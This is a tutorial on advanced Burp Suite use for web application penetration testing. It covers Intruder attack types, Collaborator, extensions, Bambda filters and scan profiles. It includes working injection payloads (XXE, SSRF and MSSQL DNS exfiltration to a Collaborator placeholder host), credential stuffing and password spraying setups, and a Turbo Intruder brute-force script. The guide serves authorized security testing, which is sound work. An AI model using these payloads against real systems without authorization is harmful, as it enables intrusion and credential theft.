Burp Suite Pro Tips: Intruder, Extensions, and Automated Scanning
Burp Suite is the standard tool for web application security testing, but most people use only a fraction of its capabilities. This guide covers the advanced features that will make you significantly faster and more thorough — from Intruder attack type selection to the extensions that serious testers rely on.
Workspace Setup for Client Work
Burp Suite Feature Reference
| Feature | How to Use | Pro/Community | Time Saved | Use Case |
|---|---|---|---|---|
| Repeater (Ctrl+R) | Send request to Repeater, modify and resend | Both | High | Manual testing iteration |
| Intruder | Mark positions, load wordlist, attack | Both (throttled) | Very High | Fuzzing, brute force |
| Turbo Intruder | Extensions tab, send to Turbo Intruder | Pro recommended | Very High | Race conditions, fast fuzzing |
| Collaborator | Insert Burp Collaborator URL | Pro | High | Blind SSRF, XXE, RCE detection |
| Match/Replace | Proxy settings, Match and Replace rules | Both | High | Modify all requests automatically |
| Param Miner extension | Right-click request, Guess params | Both (free ext) | High | Finding hidden parameters |
| Logger++ | Log all requests with grep/filter | Both (free ext) | High | Request history and analysis |
| Active Scan (Pro) | Right-click, Scan | Pro | Very High | Automated vulnerability detection |
Burp Tip: HTTP/2 Downgrade for Smuggling
Use Burp's HTTP/2 support with "Allow HTTP/2 ALPN override" to test request smuggling against HTTP/2 front-ends. In Repeater, enable HTTP/2 and send H2.TE or H2.CL smuggling requests that a vulnerable HTTP/1.1 back-end will process incorrectly.
Before touching the target, configure your project properly:
- Project files — Use named project files (not temporary projects). This persists HTTP history, scanner results, and Repeater tabs across sessions. Critical for multi-day engagements.
- Scope — Add all in-scope hosts to Target scope. Enable "Use advanced scope control" to support regex patterns for complex scope definitions like
.*\.example\.com. - Filter rules — In Proxy HTTP history, filter out noise: exclude image files (
.*\.(png|jpg|gif|ico|css|woff2)), analytics domains, and CDN hosts. This keeps history focused on application logic. - Upstream proxy — For corporate environments, configure the upstream proxy under User Options → Connections so Burp chains through the client's proxy.
Intruder Attack Types
Intruder is Burp's fuzzer. Choosing the wrong attack type wastes time. Here's when to use each:
Sniper
Tests one payload position at a time with a single payload list. Use this for fuzzing a single parameter — for example, testing an ID field for IDOR, or fuzzing a single POST parameter for SQLi.
Position: GET /api/users/§1337§ HTTP/1.1
Payloads: numbers 1–10000
Use case: IDOR, brute force single fieldBattering Ram
Places the same payload in multiple positions simultaneously. Use this when the same value needs to appear in multiple places — like when a username appears in both the request body and a cookie.
Pitchfork
Iterates multiple payload lists in parallel, pairing position 1 payload 1 with position 2 payload 1. Use this for credential stuffing from a username:password list:
Position 1 (username): admin, user1, user2
Position 2 (password): pass1, pass2, pass3
Pairs tested: admin:pass1, user1:pass2, user2:pass3Cluster Bomb
Tests every combination of payloads across all positions. Expensive but thorough. Use for password spraying where you have a list of usernames and a list of passwords to try in all combinations.
Position 1 (username): admin, user1
Position 2 (password): password, 123456
Pairs tested: admin:password, admin:123456, user1:password, user1:123456Collaborator for Out-of-Band Detection
Burp Collaborator is essential for detecting blind vulnerabilities — SSRF, blind XXE, DNS rebinding, blind command injection, and email header injection. Use it wherever you have any injected value that might trigger an outbound connection:
# SSRF test
http://<your-collaborator-subdomain>.oastify.com/test
# XXE test
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://<collaborator>.oastify.com/xxe">]>
<foo>&xxe;</foo>
# Blind SQLi DNS exfil (MSSQL)
'; exec master..xp_dirtree '//<collaborator>.oastify.com/a';--In Collaborator, check the Polling tab actively during testing. DNS interactions confirm the server is making outbound requests even if no HTTP response is returned to you.
Essential Extensions
Active Scan++
Adds dozens of additional scanner checks including CORS misconfiguration detection, blind XSS insertion, clickjacking, and Shellshock. Install via BApp Store. Enable it and re-scan endpoints that the default scanner cleared.
Autorize
Automatically retests every request with a lower-privileged session cookie, flagging responses that return the same content (indicating broken access control). Set it up with two sessions: a high-privilege token and a low-privilege token. Browse as the high-privilege user and let Autorize flag every IDOR and privilege escalation automatically.
Turbo Intruder
Uses a Python script and HTTP/2 multiplexing to send thousands of requests per second — far faster than native Intruder. Essential for race condition testing and high-speed fuzzing:
# race_single_packet_attack.py snippet
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=1,
requestsPerConnection=100,
pipeline=True)
for word in open('/usr/share/wordlists/rockyou.txt'):
engine.queue(target.req, word.rstrip())Param Miner
Discovers hidden and unlinked parameters by mining parameter names from JavaScript files, HTML comments, and wordlists. Run "Guess params" on any interesting endpoint — it frequently finds debug parameters, admin flags, and deprecated API keys that aren't in the visible interface.
GAP (Get All Parameters)
Extracts all parameter names from a target site's JavaScript and HTML to build a custom wordlist for Param Miner and Intruder fuzzing. Run it on the full site crawl output for comprehensive parameter coverage.
Bambdas: Custom HTTP History Filters
Bambdas are Java lambda expressions that filter HTTP history in real time. They're far more powerful than the basic filter UI:
// Show only requests with JSON responses containing "token"
requestResponse.response().bodyToString().contains("token") &&
requestResponse.response().mimeType().toString().contains("JSON")
// Show requests where response code changed between requests
requestResponse.response().statusCode() == 403 &&
requestResponse.request().path().contains("/admin")Save Bambdas in the Filter Library for reuse across projects.
Custom Scan Profiles
The default active scan profile is noisy and slow. Create targeted profiles for specific test goals:
- SQLi-only profile — disable all checks except injection, set insertion points to parameters only
- Headers-only profile — scan HTTP headers for injection, useful for Shellshock and header-based SSRF
- Lightweight discovery profile — passive-only scan for initial scope coverage without touching attack surface
Save custom profiles and share them across the team via Burp's configuration library export.
HTTP History Search Tricks
The HTTP history search bar supports regex. Some patterns worth saving:
# Find all requests with Authorization headers
^Authorization:
# Find responses leaking internal IPs
10\.\d+\.\d+\.\d+|192\.168\.\d+\.\d+|172\.(1[6-9]|2\d|3[01])\.\d+\.\d+
# Find JWT tokens in responses
eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+Pair Burp's findings with the WAF Evasion Studio to craft bypass variants when the scanner gets blocked, and use Encoding Pipeline to transform payloads before replaying them in Repeater.
Level up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides